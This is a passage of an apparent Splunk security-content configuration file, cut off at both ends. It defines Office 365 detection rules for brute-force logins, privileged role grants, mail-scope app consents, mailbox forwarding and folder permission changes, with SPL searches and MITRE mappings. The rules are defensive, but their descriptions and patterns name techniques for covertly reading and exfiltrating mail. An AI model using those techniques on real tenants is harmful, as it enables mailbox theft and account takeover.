"Exploitation"], "mitre_attack": ["T1098.002", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic triggers on the assignment of the 'full_access_as_app' permission to an application registration in Office 365, specifically within Exchange Online. The 'full_access_as_app' permission, identified by its GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', allows an application extensive control over Office 365 operations, including access to all mailboxes and the ability to send mail as any user. The analytic focuses on the ResourceAppId '00000002-0000-0ff1-ce00-000000000000', pinpointing permissions granted to the Office 365 Exchange Online resource. By analyzing Office 365 management activity logs and filtering Azure Active Directory workload events, the query detects when this specific permission is assigned. Monitoring this assignment is vital due to the broad access it provides, which can lead to unauthorized data access or exfiltration if misused. A true positive detection requires immediate attention to prevent potential security risks like account compromise or data loss. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = The full_access_as_app API permission may be assigned to legitimate applications. Filter as needed. action.escu.creation_date = 2024-01-29 action.escu.modification_date = 2024-01-29 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 FullAccessAsApp Permission Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = User $user$ assigned the full_access_as_app permission to the app registration $object$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 FullAccessAsApp Permission Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.002", "T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic triggers on the assignment of the 'full_access_as_app' permission to an application registration in Office 365, specifically within Exchange Online. The 'full_access_as_app' permission, identified by its GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', allows an application extensive control over Office 365 operations, including access to all mailboxes and the ability to send mail as any user. The analytic focuses on the ResourceAppId '00000002-0000-0ff1-ce00-000000000000', pinpointing permissions granted to the Office 365 Exchange Online resource. By analyzing Office 365 management activity logs and filtering Azure Active Directory workload events, the query detects when this specific permission is assigned. Monitoring this assignment is vital due to the broad access it provides, which can lead to unauthorized data access or exfiltration if misused. A true positive detection requires immediate attention to prevent potential security risks like account compromise or data loss. action.notable.param.rule_title = O365 FullAccessAsApp Permission Assigned action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Update application." | eval newvalue = mvindex('ModifiedProperties{}.NewValue',0) | spath input=newvalue | search "{}.ResourceAppId"="00000002-0000-0ff1-ce00-000000000000" "{}.RequiredAppPermissions{}.EntitlementId"="dc890d15-9560-4a4c-9b7f-a736ec74ec40" | eval Permissions = '{}.RequiredAppPermissions{}.EntitlementId' | stats count earliest(_time) as firstTime latest(_time) as lastTime values(Permissions) by user, object, user_agent, Operation | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_fullaccessasapp_permission_assigned_filter` [ESCU - O365 High Number Of Failed Authentications for User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an O365 account that has experienced more than 20 failed authentication events within a span of 5 minutes. This could be indicative of an attacker attempting to brute force or guess the password for that particular user account. It leverages the O365 Unified Audit Logs, specifically the "UserLoginFailed" events. By monitoring the frequency and volume of these events for individual users, the analytic can flag accounts that exceed the set threshold of failed attempts within the defined timeframe. Multiple failed login attempts in a short period can be a strong indicator of malicious activity. While there could be benign reasons, such as a user forgetting their password, the rapid succession of failed attempts is often a sign of an attacker trying to gain unauthorized access. By detecting and alerting on this behavior, the SOC can quickly investigate and take appropriate action, potentially stopping an attack in its early stages. Given that environments differ across organizations, security teams should consider customizing the threshold of this detection to better suit their specific needs and risk profile. If an attacker successfully guesses or brute-forces a user's password after numerous attempts, they can gain unauthorized access to the O365 environment. This unauthorized access could allow them to view sensitive emails, documents, and other data. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an O365 account that has experienced more than 20 failed authentication events within a span of 5 minutes. This could be indicative of an attacker attempting to brute force or guess the password for that particular user account. It leverages the O365 Unified Audit Logs, specifically the "UserLoginFailed" events. By monitoring the frequency and volume of these events for individual users, the analytic can flag accounts that exceed the set threshold of failed attempts within the defined timeframe. Multiple failed login attempts in a short period can be a strong indicator of malicious activity. While there could be benign reasons, such as a user forgetting their password, the rapid succession of failed attempts is often a sign of an attacker trying to gain unauthorized access. By detecting and alerting on this behavior, the SOC can quickly investigate and take appropriate action, potentially stopping an attack in its early stages. Given that environments differ across organizations, security teams should consider customizing the threshold of this detection to better suit their specific needs and risk profile. If an attacker successfully guesses or brute-forces a user's password after numerous attempts, they can gain unauthorized access to the O365 environment. This unauthorized access could allow them to view sensitive emails, documents, and other data. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Although unusual, users who have lost their passwords may trigger this detection. Filter as needed. action.escu.creation_date = 2023-10-10 action.escu.modification_date = 2023-10-10 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 High Number Of Failed Authentications for User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ failed to authenticate more than 10 times in the span of 5 minutes. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 High Number Of Failed Authentications for User - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an O365 account that has experienced more than 20 failed authentication events within a span of 5 minutes. This could be indicative of an attacker attempting to brute force or guess the password for that particular user account. It leverages the O365 Unified Audit Logs, specifically the "UserLoginFailed" events. By monitoring the frequency and volume of these events for individual users, the analytic can flag accounts that exceed the set threshold of failed attempts within the defined timeframe. Multiple failed login attempts in a short period can be a strong indicator of malicious activity. While there could be benign reasons, such as a user forgetting their password, the rapid succession of failed attempts is often a sign of an attacker trying to gain unauthorized access. By detecting and alerting on this behavior, the SOC can quickly investigate and take appropriate action, potentially stopping an attack in its early stages. Given that environments differ across organizations, security teams should consider customizing the threshold of this detection to better suit their specific needs and risk profile. If an attacker successfully guesses or brute-forces a user's password after numerous attempts, they can gain unauthorized access to the O365 environment. This unauthorized access could allow them to view sensitive emails, documents, and other data. action.notable.param.rule_title = O365 High Number Of Failed Authentications for User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation=UserLoginFailed record_type=AzureActiveDirectoryStsLogon Workload=AzureActiveDirectory | bucket span=5m _time | stats dc(_raw) AS failed_attempts values(src_ip) as src_ip by user, _time | where failed_attempts > 10 | `o365_high_number_of_failed_authentications_for_user_filter` [ESCU - O365 High Privilege Role Granted - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects when high-privilege roles, specifically "Exchange Administrator", "SharePoint Administrator", or "Global Administrator", are granted within Office 365. By monitoring O365 audit logs for events where these administrative roles are assigned to any user or service account, the analytic provides insight into critical role changes. The assignment of these roles is of paramount importance to Security Operations Centers (SOCs) as they grant extensive permissions, allowing for broad access and control over critical organizational resources and data. An unexpected or unauthorized role assignment could indicate potential malicious activity, insider threats, or misconfigurations. If an attacker or unauthorized individual is granted one of these roles, the potential impact includes gaining significant control over O365 resources, accessing, modifying, or deleting critical data, making configuration changes, and potentially compromising the overall security and functionality of the O365 environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects when high-privilege roles, specifically "Exchange Administrator", "SharePoint Administrator", or "Global Administrator", are granted within Office 365. By monitoring O365 audit logs for events where these administrative roles are assigned to any user or service account, the analytic provides insight into critical role changes. The assignment of these roles is of paramount importance to Security Operations Centers (SOCs) as they grant extensive permissions, allowing for broad access and control over critical organizational resources and data. An unexpected or unauthorized role assignment could indicate potential malicious activity, insider threats, or misconfigurations. If an attacker or unauthorized individual is granted one of these roles, the potential impact includes gaining significant control over O365 resources, accessing, modifying, or deleting critical data, making configuration changes, and potentially compromising the overall security and functionality of the O365 environment. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Privilege roles may be assigned for legitimate purposes, filter as needed. action.escu.creation_date = 2023-10-20 action.escu.modification_date = 2023-10-20 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 High Privilege Role Granted - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms"] action.risk = 1 action.risk.param._risk_message = $user$ granted high privilege roles to $ObjectId$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 High Privilege Role Granted - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects when high-privilege roles, specifically "Exchange Administrator", "SharePoint Administrator", or "Global Administrator", are granted within Office 365. By monitoring O365 audit logs for events where these administrative roles are assigned to any user or service account, the analytic provides insight into critical role changes. The assignment of these roles is of paramount importance to Security Operations Centers (SOCs) as they grant extensive permissions, allowing for broad access and control over critical organizational resources and data. An unexpected or unauthorized role assignment could indicate potential malicious activity, insider threats, or misconfigurations. If an attacker or unauthorized individual is granted one of these roles, the potential impact includes gaining significant control over O365 resources, accessing, modifying, or deleting critical data, making configuration changes, and potentially compromising the overall security and functionality of the O365 environment. action.notable.param.rule_title = O365 High Privilege Role Granted action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation="Add member to role." Workload=AzureActiveDirectory | eval role_id = mvindex('ModifiedProperties{}.NewValue',2) | eval role_name = mvindex('ModifiedProperties{}.NewValue',1) | where role_id IN ("29232cdf-9323-42fd-ade2-1d097af3e4de", "f28a1f50-f6e7-4571-818b-6a12f2af6b6c", "62e90394-69f5-4237-9190-012177145e10") | stats earliest(_time) as firstTime latest(_time) as lastTime by user Operation ObjectId role_name | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_high_privilege_role_granted_filter` [ESCU - O365 Mail Permissioned Application Consent Granted by User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where a user grants consent to an application that requests mail related permissions within the Office 365 environment. This could involve permissions to read, send, or manage mail settings. It leverages the O365 audit logs, specifically events related to application permissions and user consent actions. By filtering for mail-related permissions and user-granted consents, the analytic pinpoints potential security concerns. While many legitimate applications request mail permissions for valid reasons, malicious actors can exploit these permissions for data exfiltration, spear phishing, or other malicious activities. By monitoring for user-granted mail permissions, security teams can identify and review potentially risky consents, ensuring that only trusted applications have access to sensitive email data. If the detection is a true positive, it indicates that an application now has access to the users mail data as permitted. In the hands of a malicious actor, this could lead to unauthorized data access, email forwarding, or even the sending of malicious emails from the compromised account. Its crucial to validate the legitimacy of the application and the context of the consent to prevent potential data breaches or further malicious activities. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies instances where a user grants consent to an application that requests mail related permissions within the Office 365 environment. This could involve permissions to read, send, or manage mail settings. It leverages the O365 audit logs, specifically events related to application permissions and user consent actions. By filtering for mail-related permissions and user-granted consents, the analytic pinpoints potential security concerns. While many legitimate applications request mail permissions for valid reasons, malicious actors can exploit these permissions for data exfiltration, spear phishing, or other malicious activities. By monitoring for user-granted mail permissions, security teams can identify and review potentially risky consents, ensuring that only trusted applications have access to sensitive email data. If the detection is a true positive, it indicates that an application now has access to the users mail data as permitted. In the hands of a malicious actor, this could lead to unauthorized data access, email forwarding, or even the sending of malicious emails from the compromised account. Its crucial to validate the legitimacy of the application and the context of the consent to prevent potential data breaches or further malicious activities. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = OAuth applications that require mail permissions may be legitimate, investigate and filter as needed. action.escu.creation_date = 2023-10-12 action.escu.modification_date = 2023-10-12 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Mail Permissioned Application Consent Granted by User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ consented an OAuth application that requests mail-related permissions. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Mail Permissioned Application Consent Granted by User - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where a user grants consent to an application that requests mail related permissions within the Office 365 environment. This could involve permissions to read, send, or manage mail settings. It leverages the O365 audit logs, specifically events related to application permissions and user consent actions. By filtering for mail-related permissions and user-granted consents, the analytic pinpoints potential security concerns. While many legitimate applications request mail permissions for valid reasons, malicious actors can exploit these permissions for data exfiltration, spear phishing, or other malicious activities. By monitoring for user-granted mail permissions, security teams can identify and review potentially risky consents, ensuring that only trusted applications have access to sensitive email data. If the detection is a true positive, it indicates that an application now has access to the users mail data as permitted. In the hands of a malicious actor, this could lead to unauthorized data access, email forwarding, or even the sending of malicious emails from the compromised account. Its crucial to validate the legitimacy of the application and the context of the consent to prevent potential data breaches or further malicious activities. action.notable.param.rule_title = O365 Mail Permissioned Application Consent Granted by User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Consent to application." ResultStatus=Success | eval admin_consent =mvindex('ModifiedProperties{}.NewValue', 0) | search admin_consent=False | eval permissions =mvindex('ModifiedProperties{}.NewValue', 4) | rex field=permissions "Scope: (?[^,]+)" | makemv delim=" " Scope | search Scope IN ("Mail.Read", "Mail.ReadBasic", "Mail.ReadWrite", "Mail.Read.Shared", "Mail.ReadWrite.Shared", "Mail.Send", "Mail.Send.Shared") | stats max(_time) as lastTime values(Scope) by Operation, user, object, ObjectId | `security_content_ctime(lastTime)` | `o365_mail_permissioned_application_consent_granted_by_user_filter` [ESCU - O365 Mailbox Email Forwarding Enabled - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection is designed to identify instances where email forwarding has been enabled on mailboxes within an Office 365 environment. By monitoring for the specific operation Set-Mailbox within the o365_management_activity logs, this analytic hones in on changes made to mailbox configurations that initiate the forwarding of emails. It specifically looks for the activation of ForwardingAddress or ForwardingSmtpAddress parameters, indicating that emails are being automatically sent to another email address from the user's mailbox. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection is designed to identify instances where email forwarding has been enabled on mailboxes within an Office 365 environment. By monitoring for the specific operation Set-Mailbox within the o365_management_activity logs, this analytic hones in on changes made to mailbox configurations that initiate the forwarding of emails. It specifically looks for the activation of ForwardingAddress or ForwardingSmtpAddress parameters, indicating that emails are being automatically sent to another email address from the user's mailbox. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Email forwarding may be configured for legitimate purposes, filter as needed. action.escu.creation_date = 2024-03-26 action.escu.modification_date = 2024-03-26 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Mailbox Email Forwarding Enabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = Email forwarding configured by $user$ on mailbox $ObjectId$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Mailbox Email Forwarding Enabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection is designed to identify instances where email forwarding has been enabled on mailboxes within an Office 365 environment. By monitoring for the specific operation Set-Mailbox within the o365_management_activity logs, this analytic hones in on changes made to mailbox configurations that initiate the forwarding of emails. It specifically looks for the activation of ForwardingAddress or ForwardingSmtpAddress parameters, indicating that emails are being automatically sent to another email address from the user's mailbox. action.notable.param.rule_title = O365 Mailbox Email Forwarding Enabled action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation=Set-Mailbox | eval match1=mvfind('Parameters{}.Name', "ForwardingAddress") | eval match2=mvfind('Parameters{}.Name', "ForwardingSmtpAddress") | where match1>= 0 OR match2>= 0 | eval ForwardTo=coalesce(ForwardingAddress, ForwardingSmtpAddress) | search ForwardTo!="" | rename user_id as user | stats count earliest(_time) as firstTime latest(_time) as lastTime values(ForwardTo) as ForwardTo by user ObjectId |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_mailbox_email_forwarding_enabled_filter` [ESCU - O365 Mailbox Folder Read Permission Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection is tailored to capture instances where read permissions are assigned to mailbox folders within an Office 365 environment, utilizing the operations ModifyFolderPermissions and AddFolderPermissions as captured in the o365_management_activity. Unlike other permission modifications, this detection excludes actions related to the Calendar, Contacts, and PersonMetadata objects, focusing on core mailbox folders. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection is tailored to capture instances where read permissions are assigned to mailbox folders within an Office 365 environment, utilizing the operations ModifyFolderPermissions and AddFolderPermissions as captured in the o365_management_activity. Unlike other permission modifications, this detection excludes actions related to the Calendar, Contacts, and PersonMetadata objects, focusing on core mailbox folders. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Mailbox folder permissions may be configured for legitimate purposes, filter as needed. action.escu.creation_date = 2024-03-29 action.escu.modification_date = 2024-03-29 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Mailbox Folder Read Permission Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = A folder was granted read permission by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Mailbox Folder Read Permission Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection is tailored to capture instances where read permissions are assigned to mailbox folders within an Office 365 environment, utilizing the operations ModifyFolderPermissions and AddFolderPermissions as captured in the o365_management_activity. Unlike other permission modifications, this detection excludes actions related to the Calendar, Contacts, and PersonMetadata objects, focusing on core mailbox folders. action.notable.param.rule_title = O365 Mailbox Folder Read Permission Assigned action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=Exchange (Operation=ModifyFolderPermissions OR Operation=AddFolderPermissions) Workload=Exchange object!=Calendar object!=Contacts object!=PersonMetadata | eval isReadRole=if(match('Item.ParentFolder.MemberRights', "(ReadAny)"), "true", "false") | rename UserId as user | stats count earliest(_time) as firstTime latest(_time) as lastTime by Operation, user, object, Item.ParentFolder.MemberUpn, Item.ParentFolder.MemberRights | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_mailbox_folder_read_permission_assigned_filter` [ESCU - O365 Mailbox Folder Read Permission Granted - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection focuses on identifying changes in mailbox folder permissions within an Office 365 environment, specifically pinpointing instances where read permissions are granted. It monitors for two key operations Set-MailboxFolderPermission and Add-MailboxFolderPermission, as logged in the o365_management_activity. These operations are indicative of modifications or additions to the permissions of mailbox folders, potentially altering who can view or interact with the folder contents. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection focuses on identifying changes in mailbox folder permissions within an Office 365 environment, specifically pinpointing instances where read permissions are granted. It monitors for two key operations Set-MailboxFolderPermission and Add-MailboxFolderPermission, as logged in the o365_management_activity. These operations are indicative of modifications or additions to the permissions of mailbox folders, potentially altering who can view or interact with the folder contents. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Mailbox folder permissions may be configured for legitimate purposes, filter as needed. action.escu.creation_date = 2024-03-28 action.escu.modification_date = 2024-03-28 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Mailbox Folder Read Permission Granted - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = A folder was granted read permission by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Mailbox Folder Read Permission Granted - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection focuses on identifying changes in mailbox folder permissions within an Office 365 environment, specifically pinpointing instances where read permissions are granted. It monitors for two key operations Set-MailboxFolderPermission and Add-MailboxFolderPermission, as logged in the o365_management_activity. These operations are indicative of modifications or additions to the permissions of mailbox folders, potentially altering who can view or interact with the folder contents. action.notable.param.rule_title = O365 Mailbox Folder Read Permission Granted action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=Exchange (Operation="Set-MailboxFolderPermission" OR Operation="Add-MailboxFolderPermission" ) | eval isReadRole=if(match(AccessRights, "^(ReadItems|Author|NonEditingAuthor|Owner|PublishingAuthor|Reviewer)$"), "true", "false") | search isReadRole="true" | rename UserId as user | stats count earliest(_time) as firstTime latest(_time) as lastTime by Operation, user, Identity, AccessRights | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_mailbox_folder_read_permission_granted_filter` [ESCU - O365 Mailbox Inbox Folder Shared with All Users - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies instances where the inbox folder of a mailbox in Office 365 is shared with all users within the tenant. Sharing the inbox folder with all users is an unusual and risky configuration. Attackers have been known to exploit this setting to surreptitiously read a target user's emails from another account. Such unauthorized access can lead to data breaches, leakage of confidential information, or further compromise based on the information gathered from the emails. Monitoring for this configuration change ensures that inadvertent or malicious sharing is promptly identified and addressed. If an attacker successfully configures the inbox to be shared with all users, they can access and read all emails in the affected mailbox from any account within the tenant. This can lead to data exfiltration, spear-phishing attacks based on the information in the emails, or further malicious activities using sensitive information gathered from the mailbox. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies instances where the inbox folder of a mailbox in Office 365 is shared with all users within the tenant. Sharing the inbox folder with all users is an unusual and risky configuration. Attackers have been known to exploit this setting to surreptitiously read a target user's emails from another account. Such unauthorized access can lead to data breaches, leakage of confidential information, or further compromise based on the information gathered from the emails. Monitoring for this configuration change ensures that inadvertent or malicious sharing is promptly identified and addressed. If an attacker successfully configures the inbox to be shared with all users, they can access and read all emails in the affected mailbox from any account within the tenant. This can lead to data exfiltration, spear-phishing attacks based on the information in the emails, or further malicious activities using sensitive information gathered from the mailbox. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Administrators might temporarily share a mailbox with all users for legitimate reasons, such as troubleshooting, migrations, or other administrative tasks. Some organizations use shared mailboxes for teams or departments where multiple users need access to the same mailbox. Filter as needed. action.escu.creation_date = 2023-09-07 action.escu.modification_date = 2023-09-07 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Mailbox Inbox Folder Shared with All Users - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = Inbox folder for the $MailboxOwnerUPN$ mailbox was shared with all users. action.risk.param._risk = [{"risk_object_field": "MailboxOwnerUPN", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Mailbox Inbox Folder Shared with All Users - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies instances where the inbox folder of a mailbox in Office 365 is shared 